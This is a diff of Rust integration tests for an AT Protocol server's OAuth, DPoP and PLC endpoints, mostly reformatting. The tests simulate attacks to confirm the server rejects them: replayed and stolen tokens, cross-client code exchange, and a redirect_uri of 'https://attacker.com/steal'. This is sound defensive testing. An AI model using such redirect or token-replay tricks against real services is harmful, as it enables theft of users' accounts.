("client_id", &client_id),
388
+
])
389
+
.send()
390
+
.await
391
+
.unwrap();
392
assert_eq!(first.status(), StatusCode::OK, "First use should succeed");
393
let first_body: Value = first.json().await.unwrap();
394
+
let replay = http_client
395
+
.post(format!("{}/oauth/token", url))
396
+
.form(&[
397
+
("grant_type", "authorization_code"),
398
+
("code", &code),
399
+
("redirect_uri", redirect_uri),
400
+
("code_verifier", &code_verifier),
401
+
("client_id", &client_id),
402
+
])
403
+
.send()
404
+
.await
405
+
.unwrap();
406
+
assert_eq!(
407
+
replay.status(),
408
+
StatusCode::BAD_REQUEST,
409
+
"Auth code replay should fail"
410
+
);
411
let stolen_rt = first_body["refresh_token"].as_str().unwrap().to_string();
412
+
let first_refresh: Value = http_client
413
+
.post(format!("{}/oauth/token", url))
414
+
.form(&[
415
+
("grant_type", "refresh_token"),
416
+
("refresh_token", &stolen_rt),
417
+
("client_id", &client_id),
418
+
])
419
+
.send()
420
+
.await
421
+
.unwrap()
422
+
.json()
423
+
.await
424
+
.unwrap();
425
+
assert!(
426
+
first_refresh["access_token"].is_string(),
427
+
"First refresh should succeed"
428
+
);
429
let new_rt = first_refresh["refresh_token"].as_str().unwrap();
430
+
let rt_replay = http_client
431
+
.post(format!("{}/oauth/token", url))
432
+
.form(&[
433
+
("grant_type", "refresh_token"),
434
+
("refresh_token", &stolen_rt),
435
+
("client_id", &client_id),
436
+
])
437
+
.send()
438
+
.await
439
+
.unwrap();
440
+
assert_eq!(
441
+
rt_replay.status(),
442
+
StatusCode::BAD_REQUEST,
443
+
"Refresh token replay should fail"
444
+
);
445
let body: Value = rt_replay.json().await.unwrap();
446
+
assert!(
447
+
body["error_description"]
448
+
.as_str()
449
+
.unwrap()
450
+
.to_lowercase()
451
+
.contains("reuse")
452
+
);
453
+
let family_revoked = http_client
454
+
.post(format!("{}/oauth/token", url))
455
+
.form(&[
456
+
("grant_type", "refresh_token"),
457
+
("refresh_token", new_rt),
458
+
("client_id", &client_id),
459
+
])
460
+
.send()
461
+
.await
462
+
.unwrap();
463
+
assert_eq!(
464
+
family_revoked.status(),
465
+
StatusCode::BAD_REQUEST,
466
+
"Token family should be revoked"
467
+
);
468
}
469
470
#[tokio::test]
···
475
let mock_client = setup_mock_client_metadata(registered_redirect).await;
476
let client_id = mock_client.uri();
477
let (_, code_challenge) = generate_pkce();
478
+
let res = http_client
479
+
.post(format!("{}/oauth/par", url))
480
+
.form(&[
481
+
("response_type", "code"),
482
+
("client_id", &client_id),
483
+
("redirect_uri", "https://attacker.com/steal"),
484
+
("code_challenge", &code_challenge),
485
+
("code_challenge_method", "S256"),
486
+
])
487
+
.send()
488
+
.await
489
+
.unwrap();
490
+
assert_eq!(
491
+
res.status(),
492
+
StatusCode::BAD_REQUEST,
493
+
"Unregistered redirect_uri should be rejected"
494
+
);
495
let ts = Utc::now().timestamp_millis();
496
let handle = format!("deact-{}", ts);
497
let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
···
499
.send().await.unwrap();
500
let account: Value = create_res.json().await.unwrap();
501
let access_jwt = verify_new_account(&http_client, account["did"].as_str().unwrap()).await;
502
+
http_client
503
+
.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url))
504
+
.bearer_auth(&access_jwt)
505
+
.json(&json!({}))
506
+
.send()
507
+
.await
508
+
.unwrap();
509
+
let deact_par: Value = http_client
510
+
.post(format!("{}/oauth/par", url))
511
+
.form(&[
512
+
("response_type", "code"),
513
+
("client_id", &client_id),
514
+
("redirect_uri", registered_redirect),
515
+
("code_challenge", &code_challenge),
516
+
("code_challenge_method", "S256"),
517
+
])
518
+
.send()
519
+
.await
520
+
.unwrap()
521
+
.json()
522
+
.await
523
+
.unwrap();
524
let auth_res = http_client.post(format!("{}/oauth/authorize", url))
525
+
.header("Content-Type", "application/json")
526
.header("Accept", "application/json")
527
+
.json(&json!({"request_uri": deact_par["request_uri"].as_str().unwrap(), "username": &handle, "password": "deact-password", "remember_device": false}))
528
.send().await.unwrap();
529
+
assert_eq!(
530
+
auth_res.status(),
531
+
StatusCode::FORBIDDEN,
532
+
"Deactivated account should be blocked"
533
+
);
534
let redirect_uri_a = "https://app-a.com/callback";
535
let mock_a = setup_mock_client_metadata(redirect_uri_a).await;
536
let client_id_a = mock_a.uri();
···
544
let account2: Value = create_res2.json().await.unwrap();
545
verify_new_account(&http_client, account2["did"].as_str().unwrap()).await;
546
let (code_verifier2, code_challenge2) = generate_pkce();
547
+
let par_a: Value = http_client
548
+
.post(format!("{}/oauth/par", url))
549
+
.form(&[
550
+
("response_type", "code"),
551
+
("client_id", &client_id_a),
552
+
("redirect_uri", redirect_uri_a),
553
+
("code_challenge", &code_challenge2),
554
+
("code_challenge_method", "S256"),
555
+
])
556
+
.send()
557
+
.await
558
+
.unwrap()
559
+
.json()
560
+
.await
561
+
.unwrap();
562
+
let request_uri_a = par_a["request_uri"].as_str().unwrap();
563
+
let auth_a = http_client.post(format!("{}/oauth/authorize", url))
564
+
.header("Content-Type", "application/json")
565
+
.header("Accept", "application/json")
566
+
.json(&json!({"request_uri": request_uri_a, "username": &handle2, "password": "cross-password", "remember_device": false}))
567
.send().await.unwrap();
568
+
assert_eq!(auth_a.status(), StatusCode::OK);
569
+
let auth_body_a: Value = auth_a.json().await.unwrap();
570
+
let mut loc_a = auth_body_a["redirect_uri"].as_str().unwrap().to_string();
571
+
if loc_a.contains("/oauth/consent") {
572
+
let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url))
573
+
.header("Content-Type", "application/json")
574
+
.json(&json!({"request_uri": request_uri_a, "approved_scopes": ["atproto"], "remember": false}))
575
+
.send().await.unwrap();
576
+
let consent_body: Value = consent_res.json().await.unwrap();
577
+
loc_a = consent_body["redirect_uri"].as_str().unwrap().to_string();
578
+
}
579
+
let code_a = loc_a
580
+
.split("code=")
581
+
.nth(1)
582
+
.unwrap()
583
+
.split('&')
584
+
.next()
585
+
.unwrap();
586
+
let cross_client = http_client
587
+
.post(format!("{}/oauth/token", url))
588
+
.form(&[
589
+
("grant_type", "authorization_code"),
590
+
("code", code_a),
591
+
("redirect_uri", redirect_uri_a),
592
+
("code_verifier", &code_verifier2),
593
+
("client_id", &client_id_b),
594
+
])
595
+
.send()
596
+
.await
597
+
.unwrap();
598
+
assert_eq!(
599
+
cross_client.status(),
600
+
StatusCode::BAD_REQUEST,
601
+
"Cross-client code exchange must be rejected"
602
+
);
603
}
604
605
#[tokio::test]
606
async fn test_malformed_tokens_and_headers() {
607
let url = base_url().await;
608
let http_client = client();
609
+
let malformed = vec![
610
+
"",
611
+
"not-a-token",
612
+
"one.two",
613
+
"one.two.three.four",
614
+
"....",
615
+
"eyJhbGciOiJIUzI1NiJ9",
616
+
"eyJhbGciOiJIUzI1NiJ9.",
617
+
"eyJhbGciOiJIUzI1NiJ9..",
618
+
".eyJzdWIiOiJ0ZXN0In0.",
619
+
"!!invalid!!.eyJ9.sig",
620
+
];
621
for token in &malformed {
622
+
assert_eq!(
623
+
http_client
624
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
625
+
.bearer_auth(token)
626
+
.send()
627
+
.await
628
+
.unwrap()
629
+
.status(),
630
+
StatusCode::UNAUTHORIZED
631
+
);
632
}
633
let wrong_types = vec!["JWT", "jwt", "at+JWT", ""];
634
for typ in wrong_types {
635
let header = json!({ "alg": "HS256", "typ": typ });
636
let payload = json!({ "iss": "x", "sub": "did:plc:x", "aud": "x", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "x" });
637
+
let token = format!(
638
+
"{}.{}.{}",
639
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()),
640
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()),
641
+
URL_SAFE_NO_PAD.encode(&[1u8; 32])
642
+
);
643
+
assert_eq!(
644
+
http_client
645
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
646
+
.bearer_auth(&token)
647
+
.send()
648
+
.await
649
+
.unwrap()
650
+
.status(),
651
+
StatusCode::UNAUTHORIZED,
652
+
"typ='{}' should be rejected",
653
+
typ
654
+
);
655
}
656
let (access_token, _, _) = get_oauth_tokens(&http_client, url).await;
657
+
let invalid_formats = vec![
658
+
format!("Basic {}", access_token),
659
+
format!("Digest {}", access_token),
660
+
access_token.clone(),
661
+
format!("Bearer{}", access_token),
662
+
];
663
for auth in &invalid_formats {
664
+
assert_eq!(
665
+
http_client
666
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
667
+
.header("Authorization", auth)
668
+
.send()
669
+
.await
670
+
.unwrap()
671
+
.status(),
672
+
StatusCode::UNAUTHORIZED
673
+
);
674
}
675
+
assert_eq!(
676
+
http_client
677
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
678
+
.send()
679
+
.await
680
+
.unwrap()
681
+
.status(),
682
+
StatusCode::UNAUTHORIZED
683
+
);
684
+
assert_eq!(
685
+
http_client
686
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
687
+
.header("Authorization", "")
688
+
.send()
689
+
.await
690
+
.unwrap()
691
+
.status(),
692
+
StatusCode::UNAUTHORIZED
693
+
);
694
+
let grants = vec![
695
+
"client_credentials",
696
+
"password",
697
+
"implicit",
698
+
"",
699
+
"AUTHORIZATION_CODE",
700
+
];
701
for grant in grants {
702
+
assert_eq!(
703
+
http_client
704
+
.post(format!("{}/oauth/token", url))
705
+
.form(&[("grant_type", grant), ("client_id", "https://example.com")])
706
+
.send()
707
+
.await
708
+
.unwrap()
709
+
.status(),
710
+
StatusCode::BAD_REQUEST,
711
+
"Grant '{}' should be rejected",
712
+
grant
713
+
);
714
}
715
}
716
···
719
let url = base_url().await;
720
let http_client = client();
721
let (access_token, refresh_token, _) = get_oauth_tokens(&http_client, url).await;
722
+
assert_eq!(
723
+
http_client
724
+
.post(format!("{}/oauth/revoke", url))
725
+
.form(&[("token", &refresh_token)])
726
+
.send()
727
+
.await
728
+
.unwrap()
729
+
.status(),
730
+
StatusCode::OK
731
+
);
732
+
let introspect: Value = http_client
733
+
.post(format!("{}/oauth/introspect", url))
734
+
.form(&[("token", &access_token)])
735
+
.send()
736
+
.await
737
+
.unwrap()
738
+
.json()
739
+
.await
740
+
.unwrap();
741
+
assert_eq!(
742
+
introspect["active"], false,
743
+
"Revoked token should be inactive"
744
+
);
745
}
746
747
+
fn create_dpop_proof(
748
+
method: &str,
749
+
uri: &str,
750
+
_nonce: Option<&str>,
751
+
ath: Option<&str>,
752
+
iat_offset: i64,
753
+
) -> String {
754
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
755
use p256::elliptic_curve::sec1::ToEncodedPoint;
756
let signing_key = SigningKey::random(&mut rand::thread_rng());
···
760
let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } });
761
let mut payload = json!({ "jti": format!("unique-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)),
762
"htm": method, "htu": uri, "iat": Utc::now().timestamp() + iat_offset });
763
+
if let Some(a) = ath {
764
+
payload["ath"] = json!(a);
765
+
}
766
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
767
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
768
let signing_input = format!("{}.{}", header_b64, payload_b64);
769
let signature: Signature = signing_key.sign(signing_input.as_bytes());
770
+
format!(
771
+
"{}.{}",
772
+
signing_input,
773
+
URL_SAFE_NO_PAD.encode(signature.to_bytes())
774
+
)
775
}
776
777
#[test]
···
783
let nonce = v1.generate_nonce();
784
assert!(!nonce.is_empty());
785
assert!(v1.validate_nonce(&nonce).is_ok(), "Valid nonce should pass");
786
+
assert!(
787
+
v2.validate_nonce(&nonce).is_err(),
788
+
"Nonce from different secret should fail"
789
+
);
790
let nonce_bytes = URL_SAFE_NO_PAD.decode(&nonce).unwrap();
791
let mut tampered = nonce_bytes.clone();
792
+
if !tampered.is_empty() {
793
+
tampered[0] ^= 0xFF;
794
+
}
795
+
assert!(
796
+
v1.validate_nonce(&URL_SAFE_NO_PAD.encode(&tampered))
797
+
.is_err(),
798
+
"Tampered nonce should fail"
799
+
);
800
assert!(v1.validate_nonce("invalid").is_err());
801
assert!(v1.validate_nonce("").is_err());
802
assert!(v1.validate_nonce("!!!not-base64!!!").is_err());
···
806
fn test_dpop_proof_validation() {
807
let secret = b"test-dpop-secret-32-bytes-long!!";
808
let verifier = DPoPVerifier::new(secret);
809
+
assert!(
810
+
verifier
811
+
.verify_proof("not.enough", "POST", "https://example.com", None)
812
+
.is_err()
813
+
);
814
+
assert!(
815
+
verifier
816
+
.verify_proof("invalid", "POST", "https://example.com", None)
817
+
.is_err()
818
+
);
819
let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0);
820
+
assert!(
821
+
verifier
822
+
.verify_proof(&proof, "GET", "https://example.com/token", None)
823
+
.is_err(),
824
+
"Method mismatch"
825
+
);
826
+
assert!(
827
+
verifier
828
+
.verify_proof(&proof, "POST", "https://other.com/token", None)
829
+
.is_err(),
830
+
"URI mismatch"
831
+
);
832
+
assert!(
833
+
verifier
834
+
.verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None)
835
+
.is_ok(),
836
+
"Query params should be ignored"
837
+
);
838
let old_proof = create_dpop_proof("POST", "https://example.com/token", None, None, -600);
839
+
assert!(
840
+
verifier
841
+
.verify_proof(&old_proof, "POST", "https://example.com/token", None)
842
+
.is_err(),
843
+
"iat too old"
844
+
);
845
let future_proof = create_dpop_proof("POST", "https://example.com/token", None, None, 600);
846
+
assert!(
847
+
verifier
848
+
.verify_proof(&future_proof, "POST", "https://example.com/token", None)
849
+
.is_err(),
850
+
"iat in future"
851
+
);
852
+
let ath_proof = create_dpop_proof(
853
+
"GET",
854
+
"https://example.com/resource",
855
+
None,
856
+
Some("wrong"),
857
+
0,
858
+
);
859
+
assert!(
860
+
verifier
861
+
.verify_proof(
862
+
&ath_proof,
863
+
"GET",
864
+
"https://example.com/resource",
865
+
Some("correct")
866
+
)
867
+
.is_err(),
868
+
"ath mismatch"
869
+
);
870
let no_ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, None, 0);
871
+
assert!(
872
+
verifier
873
+
.verify_proof(
874
+
&no_ath_proof,
875
+
"GET",
876
+
"https://example.com/resource",
877
+
Some("expected")
878
+
)
879
+
.is_err(),
880
+
"Missing ath"
881
+
);
882
}
883
884
#[test]
···
899
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
900
let signing_input = format!("{}.{}", header_b64, payload_b64);
901
let signature: Signature = signing_key.sign(signing_input.as_bytes());
902
+
let mismatched = format!(
903
+
"{}.{}",
904
+
signing_input,
905
+
URL_SAFE_NO_PAD.encode(signature.to_bytes())
906
+
);
907
+
assert!(
908
+
verifier
909
+
.verify_proof(&mismatched, "POST", "https://example.com/token", None)
910
+
.is_err(),
911
+
"Mismatched key should fail"
912
+
);
913
let point = signing_key.verifying_key().to_encoded_point(false);
914
let good_header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256",
915
"x": URL_SAFE_NO_PAD.encode(point.x().unwrap()), "y": URL_SAFE_NO_PAD.encode(point.y().unwrap()) } });
···
919
let mut sig_bytes = good_sig.to_bytes().to_vec();
920
sig_bytes[0] ^= 0xFF;
921
let tampered = format!("{}.{}", good_input, URL_SAFE_NO_PAD.encode(&sig_bytes));
922
+
assert!(
923
+
verifier
924
+
.verify_proof(&tampered, "POST", "https://example.com/token", None)
925
+
.is_err(),
926
+
"Tampered sig should fail"
927
+
);
928
}
929
930
#[test]
931
fn test_jwk_thumbprint() {
932
+
let jwk = DPoPJwk {
933
+
kty: "EC".to_string(),
934
+
crv: Some("P-256".to_string()),
935
x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()),
936
+
y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()),
937
+
};
938
let tp1 = compute_jwk_thumbprint(&jwk).unwrap();
939
let tp2 = compute_jwk_thumbprint(&jwk).unwrap();
940
assert_eq!(tp1, tp2, "Thumbprint should be deterministic");
941
assert!(!tp1.is_empty());
942
+
assert!(
943
+
compute_jwk_thumbprint(&DPoPJwk {
944
+
kty: "EC".to_string(),
945
+
crv: Some("secp256k1".to_string()),
946
+
x: Some("x".to_string()),
947
+
y: Some("y".to_string())
948
+
})
949
+
.is_ok()
950
+
);
951
+
assert!(
952
+
compute_jwk_thumbprint(&DPoPJwk {
953
+
kty: "OKP".to_string(),
954
+
crv: Some("Ed25519".to_string()),
955
+
x: Some("x".to_string()),
956
+
y: None
957
+
})
958
+
.is_ok()
959
+
);
960
+
assert!(
961
+
compute_jwk_thumbprint(&DPoPJwk {
962
+
kty: "EC".to_string(),
963
+
crv: None,
964
+
x: Some("x".to_string()),
965
+
y: Some("y".to_string())
966
+
})
967
+
.is_err()
968
+
);
969
+
assert!(
970
+
compute_jwk_thumbprint(&DPoPJwk {
971
+
kty: "EC".to_string(),
972
+
crv: Some("P-256".to_string()),
973
+
x: None,
974
+
y: Some("y".to_string())
975
+
})
976
+
.is_err()
977
+
);
978
+
assert!(
979
+
compute_jwk_thumbprint(&DPoPJwk {
980
+
kty: "EC".to_string(),
981
+
crv: Some("P-256".to_string()),
982
+
x: Some("x".to_string()),
983
+
y: None
984
+
})
985
+
.is_err()
986
+
);
987
+
assert!(
988
+
compute_jwk_thumbprint(&DPoPJwk {
989
+
kty: "RSA".to_string(),
990
+
crv: None,
991
+
x: None,
992
+
y: None
993
+
})
994
+
.is_err()
995
+
);
996
}
997
998
#[test]
···
1001
use p256::elliptic_curve::sec1::ToEncodedPoint;
1002
let secret = b"test-dpop-secret-32-bytes-long!!";
1003
let verifier = DPoPVerifier::new(secret);
1004
+
let test_cases = vec![
1005
+
(-600, true),
1006
+
(-301, true),
1007
+
(-299, false),
1008
+
(0, false),
1009
+
(299, false),
1010
+
(301, true),
1011
+
(600, true),
1012
+
];
1013
for (offset, should_fail) in test_cases {
1014
let signing_key = SigningKey::random(&mut rand::thread_rng());
1015
let point = signing_key.verifying_key().to_encoded_point(false);
···
1022
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
1023
let signing_input = format!("{}.{}", header_b64, payload_b64);
1024
let signature: Signature = signing_key.sign(signing_input.as_bytes());
1025
+
let proof = format!(
1026
+
"{}.{}",
1027
+
signing_input,
1028
+
URL_SAFE_NO_PAD.encode(signature.to_bytes())
1029
+
);
1030
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1031
+
if should_fail {
1032
+
assert!(result.is_err(), "offset {} should fail", offset);
1033
+
} else {
1034
+
assert!(result.is_ok(), "offset {} should pass", offset);
1035
+
}
1036
}
1037
}
1038
···
1053
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
1054
let signing_input = format!("{}.{}", header_b64, payload_b64);
1055
let signature: Signature = signing_key.sign(signing_input.as_bytes());
1056
+
let proof = format!(
1057
+
"{}.{}",
1058
+
signing_input,
1059
+
URL_SAFE_NO_PAD.encode(signature.to_bytes())
1060
+
);
1061
+
assert!(
1062
+
verifier
1063
+
.verify_proof(&proof, "POST", "https://example.com/token", None)
1064
+
.is_ok(),
1065
+
"HTTP method should be case-insensitive"
1066
+
);
1067
}
+111
-25
tests/plc_operations.rs
+111
-25
tests/plc_operations.rs
···
7
#[tokio::test]
8
async fn test_plc_operation_auth() {
9
let client = client();
10
-
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
11
-
.send().await.unwrap();
12
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
13
-
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
14
-
.json(&json!({})).send().await.unwrap();
15
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
16
-
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
17
-
.json(&json!({ "operation": {} })).send().await.unwrap();
18
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
19
let (token, _) = create_account_and_login(&client).await;
20
-
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
21
-
.bearer_auth(&token).send().await.unwrap();
22
assert_eq!(res.status(), StatusCode::OK);
23
}
24
···
26
async fn test_sign_plc_operation_validation() {
27
let client = client();
28
let (token, _) = create_account_and_login(&client).await;
29
-
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
30
-
.bearer_auth(&token).json(&json!({})).send().await.unwrap();
31
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
32
let body: serde_json::Value = res.json().await.unwrap();
33
assert_eq!(body["error"], "InvalidRequest");
34
-
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
35
-
.bearer_auth(&token).json(&json!({ "token": "invalid-token-12345" })).send().await.unwrap();
36
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
37
let body: serde_json::Value = res.json().await.unwrap();
38
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
···
42
async fn test_submit_plc_operation_validation() {
43
let client = client();
44
let (token, did) = create_account_and_login(&client).await;
45
-
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
46
-
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
47
-
.bearer_auth(&token).json(&json!({ "operation": { "type": "invalid_type" } })).send().await.unwrap();
48
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
49
let body: serde_json::Value = res.json().await.unwrap();
50
assert_eq!(body["error"], "InvalidRequest");
51
-
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
52
-
.bearer_auth(&token).json(&json!({
53
"operation": { "type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
54
"alsoKnownAs": [], "services": {}, "prev": null }
55
-
})).send().await.unwrap();
56
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
57
let handle = did.split(':').last().unwrap_or("user");
58
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
···
75
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
76
let body: serde_json::Value = res.json().await.unwrap();
77
assert_eq!(body["error"], "InvalidRequest");
78
-
assert!(body["message"].as_str().unwrap_or("").contains("signing key") || body["message"].as_str().unwrap_or("").contains("rotation"));
79
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
80
.bearer_auth(&token).json(&json!({
81
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
···
100
async fn test_plc_token_lifecycle() {
101
let client = client();
102
let (token, did) = create_account_and_login(&client).await;
103
-
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
104
-
.bearer_auth(&token).send().await.unwrap();
105
assert_eq!(res.status(), StatusCode::OK);
106
let db_url = get_db_connection_string().await;
107
let pool = PgPool::connect(&db_url).await.unwrap();
···
113
let row = row.unwrap();
114
assert_eq!(row.token.len(), 11, "Token should be in format xxxxx-xxxxx");
115
assert!(row.token.contains('-'), "Token should contain hyphen");
116
-
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
117
let diff = row.expires_at - chrono::Utc::now();
118
-
assert!(diff.num_minutes() >= 9 && diff.num_minutes() <= 11, "Token should expire in ~10 minutes");
119
let token1 = row.token.clone();
120
-
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
121
-
.bearer_auth(&token).send().await.unwrap();
122
assert_eq!(res.status(), StatusCode::OK);
123
let token2 = sqlx::query_scalar!(
124
"SELECT t.token FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
···
7
#[tokio::test]
8
async fn test_plc_operation_auth() {
9
let client = client();
10
+
let res = client
11
+
.post(format!(
12
+
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
13
+
base_url().await
14
+
))
15
+
.send()
16
+
.await
17
+
.unwrap();
18
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
19
+
let res = client
20
+
.post(format!(
21
+
"{}/xrpc/com.atproto.identity.signPlcOperation",
22
+
base_url().await
23
+
))
24
+
.json(&json!({}))
25
+
.send()
26
+
.await
27
+
.unwrap();
28
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
29
+
let res = client
30
+
.post(format!(
31
+
"{}/xrpc/com.atproto.identity.submitPlcOperation",
32
+
base_url().await
33
+
))
34
+
.json(&json!({ "operation": {} }))
35
+
.send()
36
+
.await
37
+
.unwrap();
38
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
39
let (token, _) = create_account_and_login(&client).await;
40
+
let res = client
41
+
.post(format!(
42
+
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
43
+
base_url().await
44
+
))
45
+
.bearer_auth(&token)
46
+
.send()
47
+
.await
48
+
.unwrap();
49
assert_eq!(res.status(), StatusCode::OK);
50
}
51
···
53
async fn test_sign_plc_operation_validation() {
54
let client = client();
55
let (token, _) = create_account_and_login(&client).await;
56
+
let res = client
57
+
.post(format!(
58
+
"{}/xrpc/com.atproto.identity.signPlcOperation",
59
+
base_url().await
60
+
))
61
+
.bearer_auth(&token)
62
+
.json(&json!({}))
63
+
.send()
64
+
.await
65
+
.unwrap();
66
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
67
let body: serde_json::Value = res.json().await.unwrap();
68
assert_eq!(body["error"], "InvalidRequest");
69
+
let res = client
70
+
.post(format!(
71
+
"{}/xrpc/com.atproto.identity.signPlcOperation",
72
+
base_url().await
73
+
))
74
+
.bearer_auth(&token)
75
+
.json(&json!({ "token": "invalid-token-12345" }))
76
+
.send()
77
+
.await
78
+
.unwrap();
79
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
80
let body: serde_json::Value = res.json().await.unwrap();
81
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
···
85
async fn test_submit_plc_operation_validation() {
86
let client = client();
87
let (token, did) = create_account_and_login(&client).await;
88
+
let hostname =
89
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
90
+
let res = client
91
+
.post(format!(
92
+
"{}/xrpc/com.atproto.identity.submitPlcOperation",
93
+
base_url().await
94
+
))
95
+
.bearer_auth(&token)
96
+
.json(&json!({ "operation": { "type": "invalid_type" } }))
97
+
.send()
98
+
.await
99
+
.unwrap();
100
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
101
let body: serde_json::Value = res.json().await.unwrap();
102
assert_eq!(body["error"], "InvalidRequest");
103
+
let res = client
104
+
.post(format!(
105
+
"{}/xrpc/com.atproto.identity.submitPlcOperation",
106
+
base_url().await
107
+
))
108
+
.bearer_auth(&token)
109
+
.json(&json!({
110
"operation": { "type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
111
"alsoKnownAs": [], "services": {}, "prev": null }
112
+
}))
113
+
.send()
114
+
.await
115
+
.unwrap();
116
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
117
let handle = did.split(':').last().unwrap_or("user");
118
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
···
135
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
136
let body: serde_json::Value = res.json().await.unwrap();
137
assert_eq!(body["error"], "InvalidRequest");
138
+
assert!(
139
+
body["message"]
140
+
.as_str()
141
+
.unwrap_or("")
142
+
.contains("signing key")
143
+
|| body["message"].as_str().unwrap_or("").contains("rotation")
144
+
);
145
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
146
.bearer_auth(&token).json(&json!({
147
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
···
166
async fn test_plc_token_lifecycle() {
167
let client = client();
168
let (token, did) = create_account_and_login(&client).await;
169
+
let res = client
170
+
.post(format!(
171
+
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
172
+
base_url().await
173
+
))
174
+
.bearer_auth(&token)
175
+
.send()
176
+
.await
177
+
.unwrap();
178
assert_eq!(res.status(), StatusCode::OK);
179
let db_url = get_db_connection_string().await;
180
let pool = PgPool::connect(&db_url).await.unwrap();
···
186
let row = row.unwrap();
187
assert_eq!(row.token.len(), 11, "Token should be in format xxxxx-xxxxx");
188
assert!(row.token.contains('-'), "Token should contain hyphen");
189
+
assert!(
190
+
row.expires_at > chrono::Utc::now(),
191
+
"Token should not be expired"
192
+
);
193
let diff = row.expires_at - chrono::Utc::now();
194
+
assert!(
195
+
diff.num_minutes() >= 9 && diff.num_minutes() <= 11,
196
+
"Token should expire in ~10 minutes"
197
+
);
198
let token1 = row.token.clone();
199
+
let res = client
200
+
.post(format!(
201
+
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
202
+
base_url().await
203
+
))
204
+
.bearer_auth(&token)
205
+
.send()
206
+
.await
207
+
.unwrap();
208
assert_eq!(res.status(), StatusCode::OK);
209
let token2 = sqlx::query_scalar!(
210
"SELECT t.token FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
+126
-40
tests/plc_validation.rs
+126
-40
tests/plc_validation.rs
···
1
use tranquil_pds::plc::{
2
PlcError, PlcOperation, PlcService, PlcValidationContext, cid_for_cbor, sign_operation,
3
signing_key_to_did_key, validate_plc_operation, validate_plc_operation_for_submission,
4
verify_operation_signature,
5
};
6
-
use k256::ecdsa::SigningKey;
7
-
use serde_json::json;
8
-
